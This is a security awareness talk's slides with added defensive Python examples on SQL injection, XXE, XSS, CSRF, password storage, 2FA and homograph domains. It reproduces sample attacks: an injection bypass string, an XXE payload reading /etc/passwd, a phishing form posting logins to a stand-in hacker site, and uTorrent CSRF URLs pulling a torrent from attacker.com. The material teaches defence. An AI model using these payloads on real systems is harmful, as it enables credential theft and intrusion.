If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented at the IT-Weekend event in Ruse, Bulgaria (2017).
11. 2011 Sony PlayStation Network Outage
•23 days outage of all Sony PS3 and PSP consoles
•77 000 000 user accounts exposed
• Over 12 000 credit card numbers stolen
• Outage costs were officially $171 000 000
13. Some Facts and Numbers
97% of scanned Java apps in 2015 had code quality errors
95% of the mobile apps were vulnerable
90% of web apps have security vulnerabilities
87% of PHP applications have vulnerable security functions
43% of developers released apps with known vulnerabilities
39% increase of vulnerabilities in the last 5 years
10% of the applications still have hard-coded passwords
Sources: Vulnerability Review 2016-2017, Flexera Software; HPE Cyber Risk Report 2016; 2015 Trustwave Global Security Report; World Quality Report 2015-2016,
Capgemini; The Impact of Security on Development, Prevoty
15. The most important vulnerabilities combined into 5 titles:
1. Insecure Interface
2. Insufficient Authentication
3. Security Misconfiguration
4. Lack of Transport Encryption
5. Privacy Concerns
17. THIS TALK SHOWS SOME TECHNIQUES FOR DEVELOPING BETTER
SOFTWARE SECURITY AND HACKER DEFENSE ATTITUDE.
YOU MAY USE THESE TECHNIQUES ON COMPUTERS, WEBSITES, SYSTEMS
AND SOFTWARE THAT YOU OWN.
PERFORMING HACK ATTEMPTS WITHOUT PERMISSION ON COMPUTERS
THAT YOU DO NOT OWN IS ILLEGAL.
18. SQL Injection explained in 3 steps:
1. Imagine the following piece of code:
String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'";
2. Setting username to Peter & password to ' OR '1'='1 produces:
SELECT * FROM user WHERE name = 'Peter' AND pass='' OR '1'='1'
3. '1'='1' is always true, so Peter is logged in without a password.
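The same three steps run end to end, followed by the fix, as an added Python example (not code from the talk). It uses Python's built-in sqlite3 with a constructed one-row user table and mirrors the Java concatenation above; the parameterized version is the "use parameterized queries" point from the Action Part summary later in the deck.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample database with a single user (example data, not from the talk)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO user VALUES ('Peter', 'secret')")
    return conn


def vulnerable_login(username, password):
    """String concatenation, mirroring the Java snippet on the slide:
    whatever the user types becomes part of the SQL text itself."""
    conn = make_db()
    sql = ("SELECT * FROM user WHERE name = '" + username
           + "' AND pass='" + password + "'")
    rows = conn.execute(sql).fetchall()
    return len(rows) > 0


def safe_login(username, password):
    """Parameterized query: the values travel separately from the SQL text,
    so a quote inside them is data, never syntax."""
    conn = make_db()
    rows = conn.execute(
        "SELECT * FROM user WHERE name = ? AND pass = ?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    injected = "' OR '1'='1"  # the password from step 2 of the slide
    # With concatenation the WHERE clause becomes (name='Peter' AND pass='') OR '1'='1',
    # which matches every row; with a placeholder the literal string simply does not match.
    print("vulnerable login:", vulnerable_login("Peter", injected))
    print("parameterized login:", safe_login("Peter", injected))
```

The parameterized call sends the SQL and the two values to SQLite separately, so there is no string for the quote to escape from; the same pattern (placeholders plus a tuple of values) applies to every mainstream database driver.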
24. It can be even in
Problem:
• Checked MIME type only
• Fixed 8+ times until fully resolved (05/2016)
• Vulnerabilities up to now: 403!!! (11/2017)
• https://imagetragick.com/
25. Popular vulnerability in 2017: XML External Entity (XXE) Processing
1. Application parses XML documents.
2. The XML processor is configured to validate and process/resolve the document type declaration (DTD):
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>
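What "not configured to resolve the DTD" looks like in code, as an added Python example (not from the talk or any library). It drives the standard-library expat parser directly and refuses the two things the payload above depends on: a DOCTYPE at all (the default) and, when DTDs are explicitly allowed, any entity that carries a SYSTEM or PUBLIC identifier. The parse function and the classify helper are hypothetical names written for this example; the XML inputs are embedded as constructed test data.

```python
import xml.parsers.expat


class DtdNotAllowed(ValueError):
    """The document carries a DOCTYPE and the caller did not allow DTDs."""


class ExternalEntityNotAllowed(ValueError):
    """The DTD declares an entity or DTD with a SYSTEM or PUBLIC identifier."""


def parse_without_xxe(data, allow_dtd=False):
    """Parse XML with expat while refusing the constructs XXE needs.

    Returns (root element name, concatenated character data).
    """
    parser = xml.parsers.expat.ParserCreate()
    result = {"root": None, "text": ""}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Most applications never need a DTD; rejecting it closes the whole class.
        if not allow_dtd:
            raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")
        if system_id is not None or public_id is not None:
            raise ExternalEntityNotAllowed(f"external DTD {system_id!r} rejected")

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # A SYSTEM/PUBLIC entity names a URI (file:///etc/passwd, http://...) that a
        # resolving parser would fetch and splice into the document.
        if system_id is not None or public_id is not None:
            raise ExternalEntityNotAllowed(f"entity {name!r} -> {system_id!r} rejected")

    def on_start(name, attrs):
        if result["root"] is None:
            result["root"] = name

    def on_text(chunk):
        result["text"] += chunk

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)  # exceptions raised inside the handlers propagate out of Parse()
    return result["root"], result["text"]


def classify(data, allow_dtd=False):
    """Label a document by what the hardened parser does with it."""
    try:
        root, text = parse_without_xxe(data, allow_dtd)
    except DtdNotAllowed:
        return "dtd-rejected"
    except ExternalEntityNotAllowed:
        return "external-entity-rejected"
    return f"ok:{root}:{text}"


# The payload from the slide, embedded here as constructed test input.
XXE_PAYLOAD = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE foo [\n'
    '<!ELEMENT foo ANY >\n'
    '<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
    '<foo>&xxe;</foo>'
)
# A harmless internal entity: accepted only when the caller opts into DTDs.
INTERNAL_ENTITY_DOC = '<!DOCTYPE foo [<!ENTITY greet "hello">]><foo>&greet;</foo>'

if __name__ == "__main__":
    print(classify(XXE_PAYLOAD))                       # dtd-rejected
    print(classify(XXE_PAYLOAD, allow_dtd=True))       # external-entity-rejected
    print(classify(INTERNAL_ENTITY_DOC, allow_dtd=True))
```

The declaration is refused before any reference to `&xxe;` is reached, so the parser never gets as far as deciding whether to open the file. In application code the same rule applies to whichever XML library is in use: disable DTD processing or external entity resolution in the parser's configuration rather than trying to filter the document text.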
26. 2. Cross Site Scripting (XSS) explained
Put the following code in a search field, editbox or another text component:
<script>alert('XSS')</script>
29. Funny image or banner ad?
<img src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefault.jpg" width="80%">
31. Entire login form that tricks the user?
This video is Hilarious..... worth every second'<br><br>To see the search results, please login with the form below before proceeding:<form action="http://myhackersite.com/destination.php"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form><br/><br/><br/><br/><br/><br/>
33. The link to distribute is a little bit long…
http://testasp.vulnweb.com/Search.asp?tfSearch=This%20video%20is%20Hilarious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3ETo%20see%20the%20search%20results%2C%20please%20login%20with%20the%20form%20below%20before%20proceeding%3A%3Cform%20action%3D%22http%3A%2F%2Fmyhackersite.com%2Fdestination.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3E%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E
34. But that is what URL shortening services are for…
Here is your phishing URL: http://bit.ly/25zaEyy
36. 3. Cross-Site Request Forgery (CSRF) causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
37. 3 Easy Steps for uTorrent CSRF Exploit (2008)
1. Turn on the "Move completed downloads" option:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=
38. 2. Change the path for completed downloads to the Windows startup folder:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup
39. 3. Provide a link to a torrent containing a .bat file and malware to the end user:
http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
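Why the three steps worked is that a plain GET carrying the victim's cookie was enough to change a setting. The handler below is an added Python example (hypothetical code written for this page, not uTorrent's) of a `setsetting`-style endpoint with the defences a web GUI needs against this: state changes only via POST, a same-origin check on the Origin/Referer header, and a per-session token that a page on another origin cannot read. The port number is taken from the slide; the session class and setting names are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Scheme and host:port of the web GUI itself (port from the slide).
GUI_ORIGIN = ("http", "localhost:14774")


class GuiSession:
    """One logged-in GUI session with its own unguessable CSRF token (constructed example)."""

    def __init__(self):
        self.csrf_token = secrets.token_urlsafe(32)
        self.settings = {
            "dir_completed_download_flag": "0",
            "dir_completed_download": "/downloads",
        }


def from_gui_origin(headers):
    """True only if the Origin (or, failing that, Referer) header names the GUI's own origin.

    Comparing scheme and netloc exactly, rather than with a string prefix, means
    'http://localhost:14774.attacker.example' is rejected too.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return (parts.scheme, parts.netloc) == GUI_ORIGIN


def handle_setsetting(session, method, headers, query, body):
    """Hypothetical replacement for a GET-driven /gui/?action=setsetting endpoint.

    Returns (status, message). A browser lured to a foreign page still sends the
    victim's cookies, so the cookie proves nothing on its own; each of the three
    checks below stops the forged request independently.
    """
    if method != "POST":
        return 405, "state changes must use POST, not GET"
    if not from_gui_origin(headers):
        return 403, "request did not originate from the GUI"
    form = parse_qs(body, keep_blank_values=True)
    supplied = form.get("token", [""])[0]
    if not hmac.compare_digest(supplied, session.csrf_token):
        return 403, "missing or wrong CSRF token"
    params = parse_qs(query, keep_blank_values=True)
    key = params.get("s", [""])[0]
    value = params.get("v", [""])[0]
    if key not in session.settings:
        return 400, "unknown setting"
    session.settings[key] = value
    return 200, "ok"


if __name__ == "__main__":
    s = GuiSession()
    # Step 1 from the slide, as a forged link would issue it: refused on the method alone.
    print(handle_setsetting(s, "GET", {"Referer": "http://www.attacker.com/"},
                            "action=setsetting&s=dir_completed_download_flag&v=", ""))
    # The GUI's own form: right method, right origin, right token.
    print(handle_setsetting(s, "POST", {"Origin": "http://localhost:14774"},
                            "action=setsetting&s=dir_completed_download_flag&v=1",
                            "token=" + s.csrf_token))
```

The token check is what most frameworks give you for free; the method and origin checks are cheap extra layers that also catch the case where a token accidentally leaks into a GET URL.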
41. The Action Part (XSS&CSRF)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Regenerate cookies after login.
Check the IP address (or even contain it in cookies).
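The defence that actually neutralises the search-box payloads from slides 26 to 34 is output encoding, and the three headers above go alongside it. The following is an added Python example (not code from the talk): a page renderer that reflects the search term through `html.escape` and attaches the slide's headers. The payloads are embedded as constructed test input (the login-form one abridged).

```python
import html

# Response headers from the "Action Part (XSS&CSRF)" slide, plus an explicit content type.
SECURITY_HEADERS = {
    "X-Frame-Options": "DENY",               # page may not be framed: blocks clickjacking overlays
    "X-Content-Type-Options": "nosniff",     # browser must honour the declared Content-Type
    "X-XSS-Protection": "1; mode=block",     # legacy reflected-XSS filter in older browsers
    "Content-Type": "text/html; charset=utf-8",
}


def render_search_page(term):
    """Return (headers, body) for a results page that reflects the search term.

    html.escape turns < > & " ' into entities, so whatever the user typed is shown
    as text: it cannot open a tag in the heading or break out of the value attribute.
    """
    safe_term = html.escape(term, quote=True)
    body = (
        "<!doctype html><html><body>"
        f"<h1>Results for: {safe_term}</h1>"
        f'<form><input name="tfSearch" value="{safe_term}"></form>'
        "</body></html>"
    )
    return dict(SECURITY_HEADERS), body


def reflects_unescaped(term):
    """True if the raw term survived into the page, i.e. it would be live markup."""
    return term in render_search_page(term)[1]


# Payloads from the slides, embedded as constructed test input.
SCRIPT_PAYLOAD = "<script>alert('XSS')</script>"
FORM_PAYLOAD = (
    "This video is Hilarious..... worth every second'<br><br>To see the search "
    "results, please login with the form below before proceeding:"
    '<form action="http://myhackersite.com/destination.php">'
    "<table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr>"
    "</table><input type=submit value=LOGIN></form>"
)
ATTRIBUTE_PAYLOAD = '" onmouseover="alert(1)'   # tries to escape the value="..." attribute

if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, FORM_PAYLOAD, ATTRIBUTE_PAYLOAD):
        print(reflects_unescaped(payload), "<-", payload[:40])
    print(render_search_page(SCRIPT_PAYLOAD)[1])
```

One caveat a practitioner should know: current Chrome and Edge have removed the X-XSS-Protection filter and Firefox never implemented it, so that header is harmless but does nothing today; a Content-Security-Policy header is the modern browser-side backstop. Escaping on output remains the fix regardless of headers.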
42. The Action Part (Summary)
1. Trust no user input. Never. Ever!
2. Sanitize input and process only 100% trustworthy data.
3. Use parameterized queries and stored procedures.
4. Test! There are many scanners for SQLi, XSS, CSRF, etc.
43. Penetration Testing Tools
OWASP ZAP (Zed Attack Proxy)
Nikto
Nmap
Acunetix
Bishop Vulnerability Scanner (Chrome Plugin)
Firebug (Firefox plugin)
HP Scrawlr & HP Webinspect
Havij Pro
Sqlmap
50. • 9.8% have the passwords password, 123456 or 12345678;
• 14% have a password from the top 10 passwords
• 40% have a password from the top 100 passwords
• 79% have a password from the top 500 passwords
• 91% have a password from the top 1 000 passwords
• 98.8% have a password from the top 10 000 passwords
51. The Action Part
1. Limit login attempts.
2. Add password length and character requirements.
52. … and the "big difference":
The 3 most popular passwords now hold "only" 1.2% of all passwords:
• Password1
• Hello123
• Welcome1
Source: TrustWave
53. The Action Part
1. Limit login attempts.
2. Add password length and character requirements.
3. Password encryption
55. Still Bad Option: Shift ASCII Code or Similar*
<server>
<id>my.server</id>
<username>admin</username>
<password>Zhofrph4</password>
</server>
* There was a hot dispute in a developers' forum about whether a shift by 5 or a shift by 12 is better.
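Why the shift is a bad option, and what "password encryption" should mean in practice, as an added Python example (not code from the talk). Shifting each letter of Zhofrph4 back by 3 gives Welcome4, and since there are only 25 possible shifts the stored value is recoverable by anyone who sees the file. The second half stores a salted PBKDF2-HMAC-SHA256 hash instead, which is what a login check needs: a one-way value that can be verified but not reversed. The record format and function names are this example's own.

```python
import hashlib
import hmac
import os
import string


def shift_letters(text, shift):
    """Caesar-style shift of ASCII letters only; digits and symbols pass through unchanged."""
    out = []
    for ch in text:
        if ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        elif ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        else:
            out.append(ch)
    return "".join(out)


def all_unshifts(stored):
    """Every candidate plaintext for a shifted value: 26 tries, no secret involved."""
    return {k: shift_letters(stored, -k) for k in range(26)}


def hash_password(password, iterations=600_000, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt; returns a self-describing record."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the hash with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record type {algo!r}")
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(actual, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    stored = "Zhofrph4"                       # the value from the config file on the slide
    print("shift 3 ->", shift_letters(stored, -3))
    record = hash_password("Welcome4")
    print(record)
    print("correct password verifies:", verify_password("Welcome4", record))
    print("wrong password verifies:", verify_password("Welcome5", record))
```

Two properties of the hash record matter: the random salt means two users with the same password get different records, so a leaked table cannot be attacked with one precomputed list, and the iteration count is stored with the record so it can be raised later without invalidating existing users.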
65. LinkedIn got hacked (2012)
•164 million accounts stolen
•Account info sold now on black market
•Check haveibeenpwned.com for your account
•There are concerns even for the current fixes
69. The Real Action Part
Use two or three factor authentication (at least for important stuff)
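The second factor most often deployed for this is a time-based one-time code, so here is how it is generated and checked, as an added Python example (not code from the talk): HOTP from RFC 4226 and TOTP from RFC 6238 built on the standard library's hmac module, with a verification window for clock drift. The 20-byte secret and expected codes in the test are the published RFC test vectors; the Base32 helper mirrors how authenticator apps receive the secret.

```python
import base64
import hmac
import struct
import time


def hotp(secret, counter, digits=6, algo="sha1"):
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, at_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time in 30-second steps."""
    return hotp(secret, int(at_time) // step, digits)


def verify_totp(secret, code, at_time, step=30, digits=6, window=1):
    """Accept the current step and `window` steps either side to tolerate clock drift.

    Reject anything that is not exactly `digits` decimal characters first, so an
    empty or malformed submission can never compare equal.
    """
    if len(code) != digits or not code.isdigit():
        return False
    counter = int(at_time) // step
    return any(hmac.compare_digest(hotp(secret, c, digits), code)
               for c in range(counter - window, counter + window + 1))


def secret_from_base32(text):
    """Authenticator apps share the secret as Base32; restore padding and decode."""
    text = text.strip().replace(" ", "").upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


if __name__ == "__main__":
    # RFC 6238 reference secret (the ASCII digits 1..0 twice), as an authenticator app would show it.
    secret = secret_from_base32("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ")
    print("code for t=59:", totp(secret, 59))           # 287082 per the RFC vector
    print("code right now:", totp(secret, time.time()))
```

The server must store the shared secret as carefully as a password hash cannot be stored (it has to be reversible), rate-limit verification attempts, and remember the last accepted counter so a code cannot be replayed inside its window.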
71. Distributed Denial of Service (DDoS)
• TV Show (10000s people visit your site)
• Early days: ICQ
• Nowadays: Malware
Diagram: Real Attacker -> Master -> Daemons (five shown) -> Victim
73. Worse than DDoS: Ransomware
• Biggest problem of 2016 and 2017
• Usually encrypts the files so they become unusable
• Wants money to be paid (usually in untrackable BTC)
74. The Action Part
1. Invest in hardware
2. Backup and Recovery Plans
76. The Action Part
1. Invest in hardware
2. Backup and Recovery Plans
3. Prevent flooding
77. Access Control
Removing any site from Google using URL manipulation?
• Exploit in Google Webmaster Tools
• Fixed within 7 hours
https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=http://{YOUR_URL}/&urlt={URL_TO_BLOCK}
Source: http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html
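The access-control question a removal endpoint has to answer is not "is the caller logged in?" but "does the caller control the site that the URL to block belongs to?". The following is an added Python example of that check (hypothetical code written for this page; it is not Google's implementation and makes no claim about what their fix looked like). The verified-site table and user names are constructed.

```python
from urllib.parse import urlsplit

# Constructed ownership records: which hostnames each user has proven to control
# (in a real system this is the output of the site-verification step).
VERIFIED_SITES = {
    "alice": {"example.com"},
}


def same_site(host, site_host):
    """True if host is site_host itself or a subdomain of it.

    The dot in the suffix check matters: 'example.com.evil.test' must not pass.
    """
    return host == site_host or host.endswith("." + site_host)


def request_removal(user, site_url, url_to_block):
    """Handler for a removals-request endpoint with the ownership check in place.

    Returns (status, message). Both URLs come from the client, so both are parsed
    and the decision is made on the hostnames, never on the raw strings.
    """
    site_host = urlsplit(site_url).hostname
    target_host = urlsplit(url_to_block).hostname
    if not site_host or not target_host:
        return 400, "malformed URL"
    if site_host not in VERIFIED_SITES.get(user, set()):
        return 403, "site not verified by this user"
    if not same_site(target_host, site_host):
        return 403, "url_to_block is outside the verified site"
    return 200, "removal queued"


if __name__ == "__main__":
    print(request_removal("alice", "http://example.com/", "http://example.com/old-page"))
    print(request_removal("alice", "http://example.com/", "http://competitor.example/"))
    print(request_removal("alice", "http://example.com/", "http://example.com.evil.test/"))
```

The pattern generalises to any "act on object X" endpoint: look up who owns X on the server side and compare with the authenticated caller; never let the client supply both the object and the proof of ownership in the same request.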
78. The Action Part
1. Invest in hardware
2. Backup and Recovery Plans
3. Prevent flooding
4. Use Access Control Lists
5. Secure configuration, Logging and Monitoring
79. Google is not Google? (2012, Brazil)
• Biggest ISP in Brazil
• Firmware vulnerability
• 4.5 million routers
• Malicious DNS servers
• Fake Google.com, Facebook.com, Yahoo.com and others install malware
83. Chart: Known vulnerabilities per year by OS in the last 10 years (2005-2015); series: Windows, MacOS, Ubuntu (incl. kernel), Debian (incl. kernel); vertical axis 0 to 700.
85. The Action Part
6. Minimum open ports and running services
7. Frequent update of firmware and software
8. Secure updates – use checksums to avoid downloading fake update
90. The Action Part
6. Minimum open ports and running services, use firewall
7. Frequent update of firmware and software
8. Secure updates – use checksums to avoid downloading fake update
9. Improve physical security
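Point 8 in code, as an added Python example (not from the talk): parse a manifest in the format that `sha256sum` writes, hash the downloaded file, and accept it only when the digest matches. The manifest is constructed; its one digest is the published SHA-256 of the three bytes "abc", so the "update" is just `b"abc"` and the example runs without any download.

```python
import hashlib
import hmac

HEX = set("0123456789abcdef")


def parse_sha256sums(manifest_text):
    """Parse a manifest of lines in sha256sum format: '<64 hex chars>  <filename>'."""
    expected = {}
    for raw in manifest_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        digest = digest.lower()
        name = name.lstrip("*")          # sha256sum marks binary-mode files with '*'
        if not sep or len(digest) != 64 or set(digest) - HEX or not name:
            raise ValueError(f"malformed manifest line: {raw!r}")
        expected[name] = digest
    return expected


def verify_update(filename, content, manifest_text):
    """True if `content` hashes to the digest the manifest lists for `filename`.

    Raises ValueError for a file the manifest does not mention: an unlisted file
    is not "unknown", it is unverified, and must not be installed.
    """
    expected = parse_sha256sums(manifest_text)
    if filename not in expected:
        raise ValueError(f"{filename!r} is not listed in the manifest")
    actual = hashlib.sha256(content).hexdigest()
    # The digest is public, but comparing in constant time is a habit worth keeping.
    return hmac.compare_digest(actual, expected[filename])


# Constructed manifest; the digest is SHA-256("abc"), a standard published test value.
MANIFEST = """# sha256sum output, constructed for this example
ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad  update-1.2.bin
"""

if __name__ == "__main__":
    print("genuine:", verify_update("update-1.2.bin", b"abc", MANIFEST))
    print("tampered:", verify_update("update-1.2.bin", b"abd", MANIFEST))
```

The checksum only helps if the manifest itself cannot be swapped along with the file: fetch it over TLS from the vendor's own host or, better, verify a signature on it. A checksum published next to the download on the same plain-HTTP page protects against corrupt transfers, not against an attacker who controls the path.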
94. Non-Encrypted POST query:
When I finished the game, the following HTTP POST query was sent:
POST /path/script.cgi HTTP/1.0
From: game@*site*.com
User-Agent: HTTPTool/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

name=Peter&surname=Sabev&score=10
My "next game" was with the following POST query:
POST /path/script.cgi HTTP/1.0
From: game@*site*.com
User-Agent: HTTPTool/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

name=Peter&surname=Sabev&score=32767
98. Jeep Cherokee remotely controlled
• Uconnect radio breach
• Anyone can control your car
• Just need to know the car's IP address
• Chrysler recalls 1 400 000 vehicles
99. Plane hacked mid-air (05'2015)
• Just using a laptop and LAN cable
• Entertainment System connected to the Cabin Control System
• Default credentials
• Caused plane to climb in simulated flight
101. The Action Part
Use recommended, accepted and up to date implementation and follow the best encryption and authentication practices.
102. Compare left and right…
Left: Facebook.com, Google.com, Yahoo.com, Booking.com
Right: Facebook.com, Google.com, Yahoo.com, Booking.com
103. The letters in red are Cyrillic (IDN attack)
(Same two columns as above, with the Cyrillic letters highlighted in red; the highlighting is lost in this text version.)
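How software rather than a human can tell the two columns apart, as an added Python example (not code from the talk): convert the hostname to its punycode form (what the wire actually carries), flag any label that mixes Latin with Cyrillic or Greek letters, and map the common Cyrillic lookalikes to their Latin twins to see whether the name collapses onto a well-known brand. The lookalike table is a hand-picked subset of the Unicode confusables list, and the brand set is constructed from the names on the slide.

```python
import unicodedata

# Cyrillic lowercase letters whose glyphs are near-identical to Latin ones
# (a small hand-picked subset of the Unicode confusables table, for this example).
CYRILLIC_LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0455": "s",
}


def script_of(ch):
    """Coarse script classification taken from the character's Unicode name."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK"):
        if name.startswith(script):
            return script
    return "OTHER"


def skeleton(host):
    """Map each lookalike to its Latin twin so two visually identical names compare equal."""
    return "".join(CYRILLIC_LOOKALIKES.get(c, c) for c in host.lower())


def analyze_hostname(host, known_brands):
    """Return a report: punycode form, labels that mix scripts, and any brand the name mimics."""
    host = host.lower()
    report = {
        "punycode": host.encode("idna").decode("ascii"),
        "mixed_script_labels": [],
        "impersonates": None,
    }
    for label in host.split("."):
        scripts = {script_of(c) for c in label if c.isalpha()}
        if len(scripts) > 1:
            report["mixed_script_labels"].append(label)
    sk = skeleton(host)
    if sk != host and sk in known_brands:
        report["impersonates"] = sk
    return report


def is_homograph(host, known_brands):
    report = analyze_hostname(host, known_brands)
    return bool(report["mixed_script_labels"]) or report["impersonates"] is not None


# Constructed brand list from the slide, and a constructed lookalike with two Cyrillic o's.
BRANDS = {"facebook.com", "google.com", "yahoo.com", "booking.com"}
FAKE_GOOGLE = "g\u043e\u043egle.com"

if __name__ == "__main__":
    for host in ("google.com", FAKE_GOOGLE):
        print(host, "->", analyze_hostname(host, BRANDS))
```

The punycode form is the honest one to show in logs, mail clients and link previews: `xn--` at the start of a label is visible even when the rendered glyphs are not. A name that is entirely Cyrillic does not trip the mixed-script check (and should not, since such domains are legitimate), which is why the skeleton comparison against known brands is the second test.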
104. The Action Part
Obtain EV certificate & use 2FA
Issue was resolved for browsers in April 2017, still a problem for emails and links in social networks.
106. London HIV Clinic
• Sent emails with addresses using "To:" instead of "Bcc:"
• 730 of the 781 patient addresses contained people's full names
• Fined £180,000
113. The Ashley Madison Data Breach
• 9.7 GB user data stolen
• Search engine "Is he cheating on you?"
• 32 000 000 user accounts compromised
• Punishment in Saudi Arabia is death (about 1200 Saudi Arabian accounts leaked)
• 2 people committed suicide
• $567 000 000 lawsuit
114. The Action Part
1. Collect minimum personal information (fight Marketing if needed)
2. Ensure all collected personal data is properly protected+encrypted (when stored and in transit)
3. Ensure only authorized individuals have access to personal information (incl. internally)
4. Be extra careful with logs, error messages, testing with real data, using it with 3rd parties, etc.
115. Will my company be hacked?
Yes, eventually!
“It happened before, it will happen
again… It is just a question of when.”
-- Armageddon Movie
116. Create Responsible Disclosure Policy
“Please email security@mycompany.com to report any
security vulnerabilities”
Organize bug bounty!
See hackerone.com and bugcrowd.com
Choose white hats!
120. Links
www.owasp.org
Free Open Source Security Community
www.sans.org
SANS Institute, Certifications
https://cve.mitre.org/
Common Vulnerabilities and Exposures (CVE)
https://www.wired.com/category/security/
News and Updates
121. To avoid comedy and drama…
The Action Part: Summary
1. Don’t trust user input and always sanitize it
2. Careful with passwords, use 2FA
3. Keep your software updated and secure
4. Encrypt and store securely.
5. Be careful with sensitive data